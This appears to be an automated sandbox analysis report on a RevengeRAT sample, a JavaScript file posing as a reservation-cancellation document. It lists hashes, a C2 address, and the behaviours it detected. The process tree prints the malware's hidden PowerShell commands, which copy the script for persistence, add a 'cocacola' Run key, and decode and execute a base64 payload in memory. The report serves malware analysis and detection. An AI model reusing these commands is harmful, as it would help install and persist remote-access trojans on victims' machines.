Analysis

  • max time kernel
    118s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    15-10-2024 19:46

General

  • Target

    213124dados cancelar a reserva.js

  • Size

    60KB

  • MD5

    5508be73f4288131312fe9dcbe64322c

  • SHA1

    f579ae533109afddd4d9e528c7c393035cd80e7a

  • SHA256

    d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd

  • SHA512

    0f22d6e8378164326cf1634061281e765b29e3b0bef2eb2f1c3fd30d84a1554233c8b1eb930b6df431e982c0ce46b22f451b491892bc2b1c0a1ae60a66e2356f

  • SSDEEP

    768:qze48RhtXFS/81q/y1wGU8a1aIIEHU8aIIFTTV+i2jsm888esI8X88888gKV7+lA:qC48xhtaGcdIh8aIIxgFv

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

54.146.241.16:5222

Mutex

f9796de67e

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\213124dados cancelar a reserva.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\213124dados cancelar a reserva.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\213124dados cancelar a reserva.js'));wscript 'C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2420
      • C:\Windows\system32\wscript.exe
        "C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value 'C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js' -PropertyType String -Force;"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\213124dados cancelar a reserva.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js'))"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2720

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js

    Filesize

    60KB

    MD5

    5508be73f4288131312fe9dcbe64322c

    SHA1

    f579ae533109afddd4d9e528c7c393035cd80e7a

    SHA256

    d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd

    SHA512

    0f22d6e8378164326cf1634061281e765b29e3b0bef2eb2f1c3fd30d84a1554233c8b1eb930b6df431e982c0ce46b22f451b491892bc2b1c0a1ae60a66e2356f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    49af3ffd45d75d4a5e965defc23c7f9e

    SHA1

    048004c07cb1391e78bbdf927629585b6766f823

    SHA256

    9e4e2a4a50b99e115ae50fc12433b6450ee8c40b9aa0cdc8fba757317404439d

    SHA512

    3e7bc486be3d65e0f2ee8fd5c48582c435304661650ed9b2f21928ad80902e6e9a429a573610521183458accc9dc8d08530c3f7c79c8a536c17f7dbaa640e7c9

  • memory/2420-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize

    9.6MB

  • memory/2420-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

    Filesize

    4KB

  • memory/2420-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize

    9.6MB

  • memory/2420-7-0x00000000020F0000-0x00000000020F8000-memory.dmp

    Filesize

    32KB

  • memory/2420-5-0x000000001B590000-0x000000001B872000-memory.dmp

    Filesize

    2.9MB

  • memory/2420-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize

    9.6MB

  • memory/2420-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize

    9.6MB

  • memory/2420-6-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize

    9.6MB

  • memory/2420-31-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

    Filesize

    4KB

  • memory/2420-32-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-30-0x0000000002980000-0x000000000298A000-memory.dmp

    Filesize

    40KB